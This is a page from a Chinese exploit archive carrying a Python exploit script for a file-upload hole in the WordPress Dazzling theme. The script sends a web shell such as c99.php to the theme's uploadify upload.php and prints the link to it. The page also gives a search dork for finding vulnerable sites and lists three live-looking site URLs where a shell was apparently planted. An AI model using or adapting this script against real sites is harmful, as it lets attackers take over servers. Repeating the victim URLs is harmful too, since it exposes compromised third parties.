Wordpress Theme Dazzling Shell Upload Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Wordpress Theme Dazzling Shell Upload Vulnerability

来源：vfocus.net 作者：king_cobra 发布时间：2014-10-20

import optparse

import sys

import pycurl

from cStringIO import StringIO

print "#________________________________________________________#"

print

"|                                                                                                                                    |"

print

"|          Dazzling shell Upload Exploit                                                                    |"

print

"|                                                                                                                                    |"

print

"| Author : King Cobra                                                                                              |"

print

"| Dork : inurl:/wp-content/themes/Dazzling                                                  |"

print

"|                                                                                                                                    |"

print

"|       Greeting to : n0m0r3                                                                                      |"

print "#________________________________________________________#\n"

parser = optparse.OptionParser(usage=

'python %s  -t http://site.com -s shellname  -p UploadingPath \nExample: python %s -t http://target.com -s c99.php -p /wp-content/uploads'

%(sys.argv[0],sys.argv[0]))

parser.add_option('-t', '--target',action="store", dest="target",help="-t http://site.com", default="")

parser.add_option('-s', '--shell',action="store", dest="shellname",help="-s c99.php", default="")

parser.add_option('-p', '--path',action="store", dest="path",help="-p /wp-content/uploads", default="")

options, args = parser.parse_args()

if options.target=="": print ("Type \"python %s -h\" for help"%sys.argv[0])

else:

pth='folder'

shpath=options.path

target=options.target

filename=options.shellname

psd='Filedata'

themename='Dazzling'

c = pycurl.Curl()

c.setopt(c.POST, 1)

c.setopt(c.HTTPPOST, [('title', 'test'), ((psd, (c.FORM_FILE, filename)))])

c.setopt(c.VERBOSE, 0)

bodyOutput = StringIO()

headersOutput = StringIO()

c.setopt(c.WRITEFUNCTION, bodyOutput.write)

c.setopt(c.URL, '%s/wp-content/themes/%s/lib/uploadify/upload.php?%s=/%s' %(target,themename,pth,shpath) )

c.setopt(c.HEADERFUNCTION, headersOutput.write)

c.perform()

x=bodyOutput.getvalue()

shname=options.shellname

if "/" in shname:

shname=options.shellname.rsplit('/',1)

if x=="1":

print ('Shell uploaded successfully LINK=%s/%s/%s' %(target,shpath,shname[1]))

else:print("Shell upload Failed!")

else:

shname=options.shellname

if x=="1":

print ('Shell uploaded successfully LINK=%s/%s/%s' %(target,shpath,shname))

else:print("Shell upload Failed!")

Examples:

http://www.svityaz.net/wp-content/themes/Dazzling/sh3ll.php

http://tdpromin.net.ua/wp-content/themes/Dazzling/sh3ll.php

http://fresh-import.com.ua/wp-content/themes/dazzling/sh3ll.php

# Greeting to : n0m0r3

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告